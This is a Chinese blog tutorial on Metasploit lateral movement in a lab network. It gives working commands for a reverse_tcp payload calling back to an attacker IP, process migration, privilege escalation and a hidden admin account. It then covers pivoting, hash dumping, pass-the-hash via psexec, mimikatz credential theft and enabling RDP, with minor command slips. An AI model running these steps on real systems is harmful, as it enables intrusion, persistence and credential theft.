使用Metasploit进行内网渗透

最新推荐文章于 2024-05-03 03:26:32 发布
最新推荐文章于 2024-05-03 03:26:32 发布
阅读量1.6k 收藏 18
点赞数 3
分类专栏: 内网渗透 文章标签: 安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51468027/article/details/124640464
版权

一、网络拓扑图

假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限?

img

二、Win2008主机上线

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.196
ser lport 4444
exploit

img

三、简单信息收集

信息收集之前可以输入help了解一下meterpreter下的命令,其中有信息收集,提权等多个模块,自行了解

(1)查看目标主机当前用户与权限

meterpreter > getuid

img

(2)查看目标主机系统相关信息

meterpreter> sysinfo

img

(3)查看目标主机路由表

meterpreter > route

img

(4)查看目标主机运行进程

meterpreter> ps

img

四、迁移/注入进程

我们的木马w01ke.exe如果我们退出了shell会话或者对方关机,我们都会丢失对目标主机Win2008的控制,我们可以将进程注入到目标主机Win2008的常用进程,这样每次目标主机Win2008启动了被注入的服务进程,我们的木马也会上线

这里我们选择注入到explorer.exe,通过上面的信息收集可以知道进程explorer.exe的PID为1560,w01ke.exe的PID为2016

img

img

使用以下命令进行迁移

meterpreter> migrate 1560

img

此时再次查看目标主机进程,已经没有w01ke.exe了

img

五、提权

meterpreter> getuid      查看当前用户
meterpreter> getprivs    尽可能提升权限
meterpreter> getsystem   通过各种攻击向量来提升系统用户权限

img

六、持久后门:添加隐藏用户

meterpreter > shell 
C:\Windows\system32>net user test$ 123456 /add & net localgroup administrators test$ /add

七、扫描内网存活主机

meterpreter> info post/multi/gather/ping_sweep
meterpreter> run post/multi/gather/ping_sweep rhosts=10.10.10.1-10.10.10.5
meterpreter> run post/multi/gather/ping_sweep rhosts=10.10.10.0/24

这个模块会尝试ping内网的主机,如果有回包,说明该主机存活

img

meterpreter> info post/windows/gather/arp_scanner
meterpreter> run post/windows/gather/arp_scanner rhosts=10.10.10.1-10.10.10.5
meterpreter> run post/windows/gather/arp_scanner rhosts=10.10.10.0/24

这个模块会尝试发送arp包,如果有回包,说明该主机存活

img

八、添加内网路由

meterpreter> run autoroute -s 10.10.10.0/24
meterpreter> run autoroute -p
或者
meterpreter> run post/multi/manage/autoroute

img

九、扫描内网主机开放的端口

通过MSF SOCKS代理模块,用nmap扫描内网主机开放的端口

(1)配置SOCKS代理

meterpreter> background
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost 192.168.1.8(Win2008的IP)
msf6 auxiliary(server/socks_proxy) > exploit -j

img

修改proxychains配置

vim /etc/proxychains4.conf

img

(2)使用nmap进行扫描

proxychains nmap -sT -Pn -sV -p 22,80,445,3306 	10.10.10.128-129 --open -oN 10.10.10.0.txt

img

看到数据服务器10.10.10.128开启了445端口,那么就可以考虑Hash传递攻击(直接使用密文登录)

img

十、攻击内网主机

看到数据服务器10.10.10.128开启了445端口,那么就可以考虑Hash传递攻击(直接使用密文登录)

(1)提取Win2008的密码Hash

meterpreter> hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

以aad3b435开头的哈希值是一个空的或不存在的哈希值(空字串的占位符)

windows系统存储哈希值的方式一般为LAN Manager(LM)、NT LAN Manager(NTLM),或NT LAN Manager v2(NTLMv2)。

在LM存储方式中,当用户首次输入密码或更改密码的时候,密码被转换为哈希值,由于哈希长度的限制,将密码切分为7个字符一组的哈希值。以password123456的密码为例,哈希值以passwor和d123456的方式存储,所以攻击者只需要简单地破解7个字符一组的密码,而不是原始的4个字符。而NTLM的存储方式跟密码长度无关,密码password123456将作为整体转换为哈希值存储。

而上面aad3b435b51404eeaad3b435b51404ee是LM哈希,afffeba176210fad4628f0524bfe1942是NTLM哈希

(2)配置SMB攻击模块,传递哈希

msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec

msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
这里不能用reverse_tcp了因为这是内网环境了没办法弹回我们外网的kali来(除非做了隧道),因此我们使用正向连接

msf6 exploit(windows/smb/psexec) > set rhosts 10.10.10.128

msf6 exploit(windows/smb/psexec) > set smbuser Administrator
这里的smbuser设置为Administrator是因为上一步获取hash时得到了Administrator

msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

msf6 exploit(windows/smb/psexec) > exploit

由于数据服务器Win7的Administrator账户已被禁用,因此报错了

img

为了实验顺利进行,取消禁用

img

再次exploit,成功控制数据服务器Win7

img

(3)利用 kiwi(mimikatz) 进行信息收集

meterpreter > load kiwi
Kiwi Commands
=============

Command                Description
-------                -----------
creds_all              Retrieve all credentials (parsed)
creds_kerberos         Retrieve Kerberos creds (parsed)
creds_livessp          Retrieve Live SSP creds
creds_msv              Retrieve LM/NTLM creds (parsed)
creds_ssp              Retrieve SSP creds
creds_tspkg            Retrieve TsPkg creds (parsed)
creds_wdigest          Retrieve WDigest creds (parsed)
dcsync                 Retrieve user account information via DCSync (unparsed)
dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create   Create a golden kerberos ticket
kerberos_ticket_list   List all kerberos tickets (unparsed)
kerberos_ticket_purge  Purge any in-use kerberos tickets
kerberos_ticket_use    Use a kerberos ticket
kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam           Dump LSA SAM (unparsed) 查看目标系统的 SAMdump:
lsa_dump_secrets       Dump LSA secrets (unparsed) 查看目标系统的密码
password_change        Change the password/hash of a user
wifi_list              List wifi profiles/creds for the current user
wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

可以看到明文密码123456(如果没有明文可以尝试暴力破解)

img

(4)开启远程桌面

Usage: run getgui -u <username> -p <password>
Or:    run getgui -e

OPTIONS:

    -e        Enable RDP only.
    -f <opt>  Forward RDP Connection.
    -h        Help menu.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.

开启远程桌面服务

img

(5)远程连接

① 使用之前部署好的proxychains
proxychains rdesktop -u Administrator -p 123.com 10.10.10.128:3389

img

② 使用端口转发
meterpreter > portfwd add -l 13389 -p 3389 -r 10.10.10.128
rdesktop -u Administrator -p 123.com 127.0.0.1:13389

img

w01ke
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Python和Shell实现内IP及端口扫描
d3f4ult的博客
01-07 1327
介绍 原视频来自油管的up主“ TheCyber Mentor”的Full Ethical Hacking Course - Network Penetration Testing for Beginners (2019)课程,视频全英无字幕,以下为视频内容前4个小时(共14h)整理的个人笔记和个人理解。其中一些很基础的东西未整理(如Linux基本命令和Python基础知识)。本节内容的结果其实n...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3835
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
通过Metasploit+Ngrok穿透内长期维持访问外Android设备
小司机的奥拓
10-30 414
环境:Kali Linux系统(https://www.kali.org/downloads/)MetasploitNgrok Linux64位的端口转发工具(https://www.ngrok.cc/)
渗透之多种方式实现内穿透(详细)
qq_38348692的博客
09-03 1万+
靶机为win7 使用ms17_010_enternalbule获得meterpreter权限,在这里注意,设置payload是必须的,否则不能获得metepreter权限,直接弹到 创建跳板路由: run autoroute -s 192.168.10.0/24 创建路由 run autoroute -p 打印路由[在这里插入图片描述] 输入background退回metaploit可以看...
2024年最新内渗透:结合实战个人思路总结_内渗透思路(2)
最新发布
2401_84301389的博客
05-03 937
查看扫描结果,主要看dc,为域控标志,这里要把计算机名字记录好,票据会用到既然要做域横向移动那必须上传mimikatz利用mimikatz扫一下有没有cve2020-1472漏洞指令:lsadump::zerologon /target:域控IP /account:域控主机名$这里是存在的,因为内和我们渗透机ip不在一个段,是不能互通的,所以这里做下代理我们把这两个文件上传渗透机开启端口映射准备接收利用cs将上传的响应启动,我们渗透机则显示连接成功指令:shell frpc.exe -c frp.i
渗透——Metasploit的代理转发
m0_65544268的博客
07-10 656
计算机配置==》管理模块==》络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-内客户端渗透9.pdf 渗透测试-内络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf ...
渗透测试安全学习ppt
02-12
渗透测试是络安全领域中的一个重要环节,主要针对企业或组织内部进行的安全评估和漏洞检测。这个过程旨在模拟黑客的攻击行为,发现并修复安全漏洞,以保护关键信息和系统不受恶意攻击。以下是内渗透测试...
渗透笔记,课堂资料
03-11
渗透是对内部进行安全测试和评估的过程,通常由安全专家执行,目的是发现并修复潜在的安全漏洞。在企业环境中,内往往包含了敏感数据和关键业务系统,因此内安全至关重要。这篇“内渗透笔记,课堂资料...
0x15.第十五课 MetaSploit实现内存活telnet和http服务扫描.pdf
06-24
0x15.第十五课 MetaSploit实现内存活telnet和http服务扫描.pdf
毒蛇:metasploit-framework图形界面图形化内渗透工具
02-01
Metasploit-Framework是信息安全领域广泛使用的开源渗透测试框架,而Viper则进一步简化了其操作流程,使得内渗透更加高效。 一、Metasploit-Framework简介 Metasploit-Framework是一个开源项目,由 Rapid7 维护...
Meterpreter内穿透
快吃小蛋糕吧的博客
11-06 3301
本文转载自https://www.freebuf.com/articles/network/125278.html 本文实操部分均为本人复现 纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行络穿透的。 何谓路由 确定设备如.
Metasploit进行渗透测试的常用流程【入门】
WEL测试
04-13 2382
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它具有图形化界面和命令行界面,这里讲的是msfconsole惯用的操作流程。本章使用metasploit v5.0.2-dev版本,所以进入到msfconsole时,前缀是"msf5>",kali系统可以通过界面化启动metasploit,通过命令行启动服务,执行命令,metaspl...
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
[内渗透]—Win2008组策略GPP漏洞
Sentiment的博客
12-08 580
Windows 2008 Server引入了一项称为组策略首选项(Group Policy Preferences)的新功能,它允许管理员配置和安装以前无法使用组策略的Windows和应用程序设置。
Metasploit渗透技巧[1] 内搭桥【转】
qdslg的专栏
07-29 905
对于一次成功的渗透测试,往往都需要很多优秀的工具进行辅助。在渗透测试中听说用的最多的是一个叫做metasploit。因此想从屌丝脚本小子变成了土豪级脚本小子。所以开始了metasploit学习之旅,希望在记录下自己成长的足迹,把没有学习到知识点,无论大小都记录下来。因此有了下面和下下面的相关文章,如有错误请给予指正。 一、问题描述 在渗透测试时,m...
简简单单教你实现内穿透
热门推荐
蓝星花
03-10 2万+
sudo ./bin/ngrokd -tlsKey=server.key -tlsCrt=server.crt -domain="zzmd.superboycxx.top" -httpAddr=":8081" -httpsAddr=":8082" 屁话不讲,先来看下效果: 1.搭建环境(安装git,golang) 因为Ngrok是基于Go语言编写的 ...
MSF 内渗透(案例)
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
windows内渗透
10-14
针对 Windows 内渗透,可以采取以下几种方式: 1. 嗅探络流量:使用工具如 Wireshark、Tcpdump 等,监听内中的流量,获取目标主机的 IP 地址、开放端口、通信协议等信息。 2. 暴力破解密码:使用工具如 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值